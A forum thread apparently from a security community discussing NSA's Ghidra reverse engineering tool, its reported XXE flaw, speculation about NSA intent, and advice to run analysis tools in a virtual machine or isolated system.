Hey, everyone NSA recently announced the release of a new open source reverse engineering tool called GHIDRA. When the comparison was made with already established tools like IDA Pro, Radare2 etc, GHIDRA stands out as the favourite. I would like to get a comprehensive analysis from anyone who has access to it before and how it is better.
@3zculprit said:
Hey, everyone NSA recently announced the release of a new open source reverse engineering tool called GHIDRA. When the comparison was made with already established tools like IDA Pro, Radare2 etc, GHIDRA stands out as the favourite. I would like to get a comprehensive analysis from anyone who has access to it before and how it is better.
. . . NSA . . .
Nahhh. Not even curious. Not worth it.
Well here is my 2 sense.
IT was released and was found to be vulnerable to at least 1 major flaw out the gate.
One needs to ask themselves did they mean to do that
٩(๏̯͡๏)ゞ?
IF you wish I or anyone here can probably explain to you a little about what they mean about stealing SMB hashes via XXE attacks and what have You or at least point you to the correct places for research. They may also be able to crack Your password if they grab it, as well as use the hash if you use something like outlook or something like that or office 365 they may be able to use tools like mailsniper or ruler to get a shell on the network by just grabbing a users hash so the implications of them hoping to get this on an adversary computer is pretty big to me. But hey I am no conspiracy theorist but how does the reverse engineering hacker group not know to have proper XML parser or know that could be attacked that’s like medium level challenge here does that mean some of us are better than them or are we expected to think this was an accident.
Either way keep your PC safe write your own stuff or use something safe. like the others You mentioned.
How to use Ghidra problem free:
- Download .exe
- Turn off internet
- Do the ■■■■ you want to do
- Uninstall
!!!
Fear no more of NSA spying.
Type your comment> @pcmhdhp said:
How to use Ghidra problem free:
- Download .exe
- Turn off internet
- Do the ■■■■ you want to do
- Uninstall
!!!
Fear no more of NSA spying.
Use at least a virtual machine for reverse engineering or ideally a separate system. Disconnecting from the internet is a good idea but sometimes not enough. If your system gets owned by your tools or by the code you’re analyzing it will still be owned when you turn your internet back on.
Type your comment> @zaicurity said:
Type your comment> @pcmhdhp said:
How to use Ghidra problem free:
- Download .exe
- Turn off internet
- Do the ■■■■ you want to do
- Uninstall
!!!
Fear no more of NSA spying.
Use at least a virtual machine for reverse engineering or ideally a separate system. Disconnecting from the internet is a good idea but sometimes not enough. If your system gets owned by your tools or by the code you’re analyzing it will still be owned when you turn your internet back on.
That’s true. I’ve met a few malwares in the past that get installed into your system and try to ping back to their host every x minutes, meaning even if you have no internet for the moment of use, and then turn it back on, it will still get owned